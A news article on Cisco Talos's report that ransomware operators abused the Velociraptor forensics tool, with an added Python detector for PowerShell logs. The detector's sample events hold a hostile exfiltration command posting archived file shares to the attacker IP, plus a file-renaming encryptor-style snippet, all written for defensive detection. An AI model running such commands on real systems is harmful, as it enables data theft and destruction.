Cisco Talos has confirmed that ransomware operators are now abusing Velociraptor, an open-source digital forensics and incident response (DFIR) tool, in live ransomware campaigns.
“Ransomware operators are leveraging Velociraptor, an open-source DFIR tool that had not previously been definitively tied to ransomware incidents,” Talos stated in its latest threat intelligence report.
Velociraptor is designed to help defenders hunt threats, collect forensic data, and respond to incidents across Windows, Linux, and macOS systems. But in this case, attackers turned the tool against its intended purpose.
Talos observed the threat actors deploying an outdated version of Velociraptor (0.73.4.0) that contains a privilege-escalation vulnerability (CVE-2025-6264), which allowed arbitrary command execution and endpoint takeover.
The adversaries reportedly used Velociraptor to maintain stealthy persistence within compromised networks while executing additional payloads, including LockBit and Babuk ransomware. Talos notes that this capability “ensured the actors maintained stealthy persistent access while deploying LockBit and Babuk ransomware,” a further sign that repurposing defensive tooling for offense has become routine.
Cisco Talos attributes this campaign with moderate confidence to Storm-2603, a suspected China-based threat actor first linked to the exploitation of the SharePoint vulnerabilities known collectively as ToolShell.
The group’s operational fingerprint, from the use of Warlock, LockBit, and now Babuk ransomware to disabling Microsoft Defender protections and manipulating IIS components, matches tactics previously documented by Microsoft’s threat intelligence teams.
“Storm-2603 is known for deploying Warlock ransomware and LockBit ransomware in the same engagement,” Talos wrote. “It is highly unusual for actors to use two different ransomware variants in the same attack, increasing our confidence that this activity could be related to Storm-2603.”
The campaign, which unfolded in August 2025, combined Warlock, LockBit, and Babuk ransomware in one coordinated operation targeting VMware ESXi virtual machines and Windows servers. Victims faced severe operational disruption as the attackers encrypted both physical and virtual infrastructure, including vSphere-managed environments, while using Velociraptor for continuous control.
Even more unusually, Talos detected Babuk ransomware files, which the Storm-2603 group had never previously deployed, suggesting ongoing experimentation within their playbook.
The attackers deployed a fileless PowerShell encryptor that recursively targeted dozens of file extensions — from Office documents to source code — and appended extensions like “.xlockxlock” for Warlock and “.babyk” for Babuk.
Talos also discovered a PowerShell-based exfiltration script that uploaded stolen data to an attacker-controlled IP address (65.38.121[.]226). The script set “$ProgressPreference = ‘SilentlyContinue’”, which suppresses PowerShell’s progress-bar output; this keeps the console quiet and speeds up cmdlets such as Invoke-WebRequest, but it does not disable script block logging or endpoint telemetry. Defenders should treat the setting as a weak indicator that only becomes meaningful in combination with other behaviour, such as a web cmdlet posting an archive to a raw IP address.
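The behaviours described in the two paragraphs above (a recursive encryptor appending “.xlockxlock” or “.babyk”, and an exfiltration script that silences the progress bar and uploads to a raw IP) can be hunted in PowerShell Script Block Logging (Event ID 4104) text. The detector below is an added example written for this page, not code from Talos or from the Velociraptor project; the regexes, the host names and the three sample script blocks are constructed, and only the IP address and the two file extensions come from the article. It deliberately does not fire on the benign third sample, which uses the same $ProgressPreference line to download an installer from a hostname.

```python
"""Hunt constructed PowerShell script-block text for the patterns the Talos
write-up describes. Hypothetical detector; regexes and samples are ours."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Indicators from the article. The IP is printed defanged there, so refang it.
EXFIL_IP = "65.38.121[.]226".replace("[.]", ".")
RANSOM_EXTENSIONS = (".xlockxlock", ".babyk")  # Warlock, Babuk

# Assumed patterns, not Talos' published rules.
RE_PROGRESS_OFF = re.compile(r"\$ProgressPreference\s*=\s*['\"]SilentlyContinue['\"]", re.I)
RE_WEB_CMDLET = re.compile(r"\b(Invoke-WebRequest|Invoke-RestMethod|iwr|irm|curl|wget)\b", re.I)
RE_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
RE_RECURSE = re.compile(r"\b(Get-ChildItem|gci)\b[^\n]*-Recurse", re.I)
RE_DOTNET_CRYPTO = re.compile(r"\[System\.Security\.Cryptography\.|CreateEncryptor|AesManaged", re.I)


@dataclass
class Finding:
    host: str
    severity: str
    reasons: List[str] = field(default_factory=list)


def analyze_script_block(host: str, script: str) -> Optional[Finding]:
    """Return a Finding when the script shows the campaign's combined behaviours."""
    reasons: List[str] = []
    ips = set(RE_IPV4.findall(script))
    progress_off = bool(RE_PROGRESS_OFF.search(script))
    web_cmdlet = bool(RE_WEB_CMDLET.search(script))

    if EXFIL_IP in ips:
        reasons.append(f"contacts known exfiltration IP {EXFIL_IP}")
    # $ProgressPreference alone is ubiquitous in admin scripts; only flag it
    # together with a web cmdlet talking to a bare IP instead of a hostname.
    if progress_off and web_cmdlet and ips:
        reasons.append("web cmdlet with progress bar suppressed, target is a raw IP")
    hits = [ext for ext in RANSOM_EXTENSIONS if ext in script.lower()]
    if hits:
        reasons.append("references ransomware extension(s): " + ", ".join(hits))
    if RE_RECURSE.search(script) and RE_DOTNET_CRYPTO.search(script):
        reasons.append("recursive file enumeration combined with .NET crypto API")

    if not reasons:
        return None
    severity = "high" if (EXFIL_IP in ips or hits) else "medium"
    return Finding(host, severity, reasons)


def scan(events: List[Tuple[str, str]]) -> List[Finding]:
    """Run the analyzer over (host, script_block_text) pairs, dropping non-hits."""
    return [f for f in (analyze_script_block(h, s) for h, s in events) if f]


# Constructed sample script blocks, standing in for the ScriptBlockText field.
SAMPLE_EVENTS = [
    ("fileserver01",
     "$ProgressPreference = 'SilentlyContinue'\n"
     "Get-ChildItem C:\\Shares -Recurse -File | Compress-Archive -DestinationPath C:\\Windows\\Temp\\d.zip\n"
     "Invoke-WebRequest -Uri http://65.38.121.226/up -Method Post -InFile C:\\Windows\\Temp\\d.zip"),
    ("esxi-mgmt02",
     "$exts = @('.docx','.xlsx','.cs','.java')\n"
     "gci D:\\ -Recurse -File | ? { $exts -contains $_.Extension } | % {\n"
     "  $aes = [System.Security.Cryptography.Aes]::Create()\n"
     "  Rename-Item $_.FullName ($_.FullName + '.xlockxlock') }"),
    ("admin-ws03",  # benign: same preference line, download from a hostname
     "$ProgressPreference = 'SilentlyContinue'\n"
     "Invoke-WebRequest -Uri https://example.com/tools/agent.msi -OutFile C:\\Temp\\agent.msi"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.severity}")
        for r in f.reasons:
            print(f"  - {r}")
```

In production the `SAMPLE_EVENTS` list would be replaced by the ScriptBlockText of real 4104 events pulled from the endpoint or SIEM, and the IP allow-list extended as new infrastructure is published; the severity split is there so that the extension and IP indicators, which are specific to this campaign, outrank the generic behavioural pair.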
“The addition of this tool in the ransomware playbook is in line with findings from Talos’ 2024 Year in Review, which highlights that threat actors are utilizing an increasing variety of commercial and open-source products,” the researchers added.